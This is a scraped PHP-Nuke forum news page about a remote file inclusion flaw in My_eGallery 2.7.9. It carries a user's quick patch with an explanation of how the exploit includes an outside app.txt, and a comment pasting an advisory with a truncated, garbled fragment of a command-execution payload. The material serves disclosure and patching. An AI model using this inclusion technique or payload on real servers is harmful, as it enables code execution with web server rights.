 |
|
 |
|
- Readme First! -
Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 183 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
Security Bug in My_eGallery 2.7.9 FIXED!!! READ!!! |
|
 Laffer writes "I found out how to fix quickly the Security Exploit.
Open the File displayCategory.php in /modules/My_eGallery/public
after the first line starting
insert:
$bug = strpos($basepath,"http");
if ($bug === false) {
and before the last line starting with ?>
insert:
}
else {
echo "You are trying to hack our site! GO AWAY BASTARD!";
}
How does this work? The exploit is STUPID! $basepath contains the basepath of the My_eGallery Modules. In the first lines displayCategory.php some files must be included. Now if the attacker give $basepath via the URL a new content in the exploits case the http://www.bywordonline.com/sc/app.txt value, then the module includes this Code from outside into the program. The app.txt runs then system calls with the rights of the webserver.
My fix will test if basepath contains a link to outside url instead of a local path (looking for http), if this is found, Code execution is suspended. Maybe not the best fix, but a quick fix. There is still a hole, but now the attacker must first upload a bad file to execute it. I will work further on this issue to fix it completely. Help from the Nukecops would be great!!!
See ya
"
|
|
Posted on Friday, November 28 @ 16:20:30 CET by Zhen-Xjell |
|
|
|
|
| |
|
Average Score: 5
Votes: 3
|
|
|
|
|
|
|
| | The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
| No Comments Allowed for Anonymous, please register | | | | |
Re: Security Bug in My_eGallery 2.7.9 FIXED!!! READ!!! (Score: 1)
by Johan1982 on Friday, November 28 @ 18:40:47 CET
(User Info | Send a Message) | | Still is not known a permanent solution? Hopefully that the staff of Nukecops contributes to do fix permanent |
| | | | |
Re: Security Bug in My_eGallery 2.7.9 FIXED!!! READ!!! (Score: 1)
by Jeruvy on Friday, November 28 @ 18:58:41 CET
(User Info | Send a Message) | | Here is the actual exploit. For some reason ZjenXjell doesn't want to post my news on this so I'm including it here. Perhaps you can gather a solution to this:
Product: My_eGallery
Versions affected: all /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).
3. Solution
-----------
Vendor was contacted and promptly replied. Fix is available at the vendor's
site:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
e=index&req=viewdownload&cid=5
As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.
Regards,
Bojan Zdrnja
CISSP
|
| | | | | |
|
